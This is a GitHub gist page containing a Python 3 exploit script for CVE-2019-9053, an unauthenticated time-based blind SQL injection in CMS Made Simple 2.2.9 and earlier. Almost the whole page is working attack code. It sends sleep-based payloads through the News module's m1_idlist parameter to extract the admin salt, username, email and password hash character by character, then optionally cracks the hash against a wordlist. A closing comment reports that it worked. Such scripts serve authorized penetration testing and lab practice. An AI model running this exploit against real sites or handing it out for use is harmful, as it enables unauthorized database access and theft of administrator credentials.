Last active
September 25, 2024 17:32
-
-
Save kriss-u/321f0418778697e2ec919f04664ceb4b to your computer and use it in GitHub Desktop.
cmsmadesimple <= 2.2.9 SQL injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 | |
# Date: 30-03-2019 | |
# Exploit Author: Daniele Scanu @ Certimeter Group | |
# Vendor Homepage: https://www.cmsmadesimple.org/ | |
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ | |
# Version: <= 2.2.9 | |
# Tested on: Ubuntu 18.04 LTS | |
# CVE : CVE-2019-9053 | |
# Updated by Krishna Upadhyay for Python 3 | |
import requests | |
from termcolor import colored | |
import time | |
from termcolor import cprint | |
import optparse | |
import hashlib | |
parser = optparse.OptionParser() | |
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)") | |
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") | |
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False) | |
options, args = parser.parse_args() | |
if not options.url: | |
print("[+] Specify an url target") | |
print("[+] Example usage (no cracking password): exploit.py -u http://target-uri") | |
print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist") | |
print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.") | |
exit() | |
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' | |
session = requests.Session() | |
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' | |
flag = True | |
password = "" | |
temp_password = "" | |
TIME = 1 | |
db_name = "" | |
output = "" | |
email = "" | |
salt = '' | |
wordlist = "" | |
if options.wordlist: | |
wordlist += options.wordlist | |
def crack_password(): | |
global password | |
global output | |
global wordlist | |
global salt | |
dict = open(wordlist, encoding='utf-8', errors='ignore') | |
for line in dict.readlines(): | |
line = line.replace("\n", "") | |
beautify_print_try(line) | |
if hashlib.md5((salt + line).encode('utf-8')).hexdigest() == password: | |
output += "\n[+] Password cracked: " + line | |
break | |
dict.close() | |
def beautify_print_try(value): | |
global output | |
print("\033c") | |
cprint(output,'green', attrs=['bold']) | |
cprint('[*] Try: ' + value, 'red', attrs=['bold']) | |
def beautify_print(): | |
global output | |
print("\033c") | |
cprint(output,'green', attrs=['bold']) | |
def dump_salt(): | |
global flag | |
global salt | |
global output | |
ord_salt = "" | |
ord_salt_temp = "" | |
while flag: | |
flag = False | |
for i in range(0, len(dictionary)): | |
temp_salt = salt + dictionary[i] | |
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] | |
beautify_print_try(temp_salt) | |
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+" | |
url = url_vuln + "&m1_idlist=" + payload | |
start_time = time.time() | |
r = session.get(url) | |
elapsed_time = time.time() - start_time | |
if elapsed_time >= TIME: | |
flag = True | |
break | |
if flag: | |
salt = temp_salt | |
ord_salt = ord_salt_temp | |
flag = True | |
output += '\n[+] Salt for password found: ' + salt | |
def dump_password(): | |
global flag | |
global password | |
global output | |
ord_password = "" | |
ord_password_temp = "" | |
while flag: | |
flag = False | |
for i in range(0, len(dictionary)): | |
temp_password = password + dictionary[i] | |
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:] | |
beautify_print_try(temp_password) | |
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users" | |
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+" | |
url = url_vuln + "&m1_idlist=" + payload | |
start_time = time.time() | |
r = session.get(url) | |
elapsed_time = time.time() - start_time | |
if elapsed_time >= TIME: | |
flag = True | |
break | |
if flag: | |
password = temp_password | |
ord_password = ord_password_temp | |
flag = True | |
output += '\n[+] Password found: ' + password | |
def dump_username(): | |
global flag | |
global db_name | |
global output | |
ord_db_name = "" | |
ord_db_name_temp = "" | |
while flag: | |
flag = False | |
for i in range(0, len(dictionary)): | |
temp_db_name = db_name + dictionary[i] | |
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] | |
beautify_print_try(temp_db_name) | |
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+" | |
url = url_vuln + "&m1_idlist=" + payload | |
start_time = time.time() | |
r = session.get(url) | |
elapsed_time = time.time() - start_time | |
if elapsed_time >= TIME: | |
flag = True | |
break | |
if flag: | |
db_name = temp_db_name | |
ord_db_name = ord_db_name_temp | |
output += '\n[+] Username found: ' + db_name | |
flag = True | |
def dump_email(): | |
global flag | |
global email | |
global output | |
ord_email = "" | |
ord_email_temp = "" | |
while flag: | |
flag = False | |
for i in range(0, len(dictionary)): | |
temp_email = email + dictionary[i] | |
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] | |
beautify_print_try(temp_email) | |
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+" | |
url = url_vuln + "&m1_idlist=" + payload | |
start_time = time.time() | |
r = session.get(url) | |
elapsed_time = time.time() - start_time | |
if elapsed_time >= TIME: | |
flag = True | |
break | |
if flag: | |
email = temp_email | |
ord_email = ord_email_temp | |
output += '\n[+] Email found: ' + email | |
flag = True | |
dump_salt() | |
dump_username() | |
dump_email() | |
dump_password() | |
if options.cracking: | |
print(colored("[*] Now try to crack password")) | |
crack_password() | |
beautify_print() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thank you so much. It worked!